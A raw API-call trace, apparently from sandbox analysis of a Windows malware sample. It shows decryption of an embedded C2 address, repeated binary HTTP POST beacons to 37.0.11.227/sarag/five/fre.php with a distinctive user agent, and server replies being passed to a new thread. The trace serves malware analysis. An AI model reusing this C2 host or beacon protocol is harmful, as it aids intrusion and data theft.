0x690000 [0327.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0327.224] GetProcessHeap () returned 0x690000 [0327.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0327.225] GetProcessHeap () returned 0x690000 [0327.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0327.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.226] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.230] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0327.235] GetProcessHeap () returned 0x690000 [0327.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0327.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.236] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0327.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.237] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.238] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.238] GetProcessHeap () returned 0x690000 [0327.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0327.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.239] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0327.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.240] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0327.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.241] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0327.241] GetProcessHeap () returned 0x690000 [0327.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0327.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.241] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0327.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.242] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0327.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.243] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0327.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.244] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0327.244] GetProcessHeap () returned 0x690000 [0327.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0327.244] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0327.244] GetProcessHeap () returned 0x690000 [0327.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0327.244] socket (af=2, type=1, protocol=6) returned 0xb68 [0327.246] connect (s=0xb68, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0327.281] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0327.281] GetProcessHeap () returned 0x690000 [0327.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0327.281] GetProcessHeap () returned 0x690000 [0327.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0327.282] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.283] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0327.283] GetProcessHeap () returned 0x690000 [0327.283] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0327.283] GetProcessHeap () returned 0x690000 [0327.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.284] GetProcessHeap () returned 0x690000 [0327.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0327.284] GetProcessHeap () returned 0x690000 [0327.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0327.285] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.286] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0327.286] GetProcessHeap () returned 0x690000 [0327.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0327.286] GetProcessHeap () returned 0x690000 [0327.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.286] send (s=0xb68, buf=0x6ad508*, len=242, flags=0) returned 242 [0327.287] send (s=0xb68, buf=0x6aba40*, len=159, flags=0) returned 159 [0327.287] GetProcessHeap () returned 0x690000 [0327.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0327.287] recv (in: s=0xb68, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0327.359] GetProcessHeap () returned 0x690000 [0327.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0327.360] GetProcessHeap () returned 0x690000 [0327.361] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0327.361] GetProcessHeap () returned 0x690000 [0327.361] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0327.361] GetProcessHeap () returned 0x690000 [0327.361] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0327.361] closesocket (s=0xb68) returned 0 [0327.362] GetProcessHeap () returned 0x690000 [0327.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0327.362] GetProcessHeap () returned 0x690000 [0327.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0327.363] GetProcessHeap () returned 0x690000 [0327.363] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0327.363] GetProcessHeap () returned 0x690000 [0327.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0327.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18b4) returned 0xb68 [0327.371] Sleep (dwMilliseconds=0xea60) [0327.372] GetProcessHeap () returned 0x690000 [0327.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0327.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.374] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0327.390] GetProcessHeap () returned 0x690000 [0327.390] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0327.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.406] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0327.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.407] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.408] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.408] GetProcessHeap () returned 0x690000 [0327.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0327.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.410] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0327.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.411] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0327.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.414] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0327.414] GetProcessHeap () returned 0x690000 [0327.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0327.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.415] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0327.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.416] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0327.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.417] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0327.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.418] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0327.418] GetProcessHeap () returned 0x690000 [0327.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0327.419] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0327.419] GetProcessHeap () returned 0x690000 [0327.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0327.419] GetProcessHeap () returned 0x690000 [0327.420] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0327.420] GetProcessHeap () returned 0x690000 [0327.420] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0327.420] GetProcessHeap () returned 0x690000 [0327.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0327.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.435] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0327.441] GetProcessHeap () returned 0x690000 [0327.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0327.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.442] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0327.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.443] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.444] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.444] GetProcessHeap () returned 0x690000 [0327.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0327.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.446] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0327.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.447] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0327.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.448] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0327.448] GetProcessHeap () returned 0x690000 [0327.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0327.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.449] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0327.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.451] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0327.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.452] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0327.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.453] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0327.453] GetProcessHeap () returned 0x690000 [0327.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0327.453] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0327.453] GetProcessHeap () returned 0x690000 [0327.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0327.453] socket (af=2, type=1, protocol=6) returned 0xb6c [0327.454] connect (s=0xb6c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0327.482] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0327.482] GetProcessHeap () returned 0x690000 [0327.482] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0327.482] GetProcessHeap () returned 0x690000 [0327.482] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0327.483] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.484] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0327.484] GetProcessHeap () returned 0x690000 [0327.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0327.484] GetProcessHeap () returned 0x690000 [0327.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.485] GetProcessHeap () returned 0x690000 [0327.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0327.485] GetProcessHeap () returned 0x690000 [0327.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0327.485] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0327.486] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0327.486] GetProcessHeap () returned 0x690000 [0327.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0327.487] GetProcessHeap () returned 0x690000 [0327.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0327.487] send (s=0xb6c, buf=0x6ad508*, len=242, flags=0) returned 242 [0327.488] send (s=0xb6c, buf=0x6aba40*, len=159, flags=0) returned 159 [0327.488] GetProcessHeap () returned 0x690000 [0327.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0327.488] recv (in: s=0xb6c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0327.602] GetProcessHeap () returned 0x690000 [0327.602] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0327.602] GetProcessHeap () returned 0x690000 [0327.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0327.603] GetProcessHeap () returned 0x690000 [0327.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0327.603] GetProcessHeap () returned 0x690000 [0327.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0327.603] closesocket (s=0xb6c) returned 0 [0327.604] GetProcessHeap () returned 0x690000 [0327.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0327.604] GetProcessHeap () returned 0x690000 [0327.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0327.604] GetProcessHeap () returned 0x690000 [0327.604] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0327.604] GetProcessHeap () returned 0x690000 [0327.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0327.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18b8) returned 0xb6c [0327.607] Sleep (dwMilliseconds=0xea60) [0327.609] GetProcessHeap () returned 0x690000 [0327.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0327.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.619] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0327.711] GetProcessHeap () returned 0x690000 [0327.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0327.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.712] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0327.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.713] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0327.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.714] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0327.714] GetProcessHeap () returned 0x690000 [0327.715] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0327.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.719] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0327.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.721] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0327.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.723] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0327.723] GetProcessHeap () returned 0x690000 [0327.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0327.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.725] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0327.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.728] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0327.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.729] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0327.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0327.730] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0327.730] GetProcessHeap () returned 0x690000 [0327.730] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0327.730] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0327.731] GetProcessHeap () returned 0x690000 [0327.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0327.731] GetProcessHeap () returned 0x690000 [0327.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0327.732] GetProcessHeap () returned 0x690000 [0327.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0327.733] GetProcessHeap () returned 0x690000 [0327.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0327.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.734] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0327.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0327.745] GetProcessHeap () returned 0x690000 [0327.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0327.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0327.746] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: 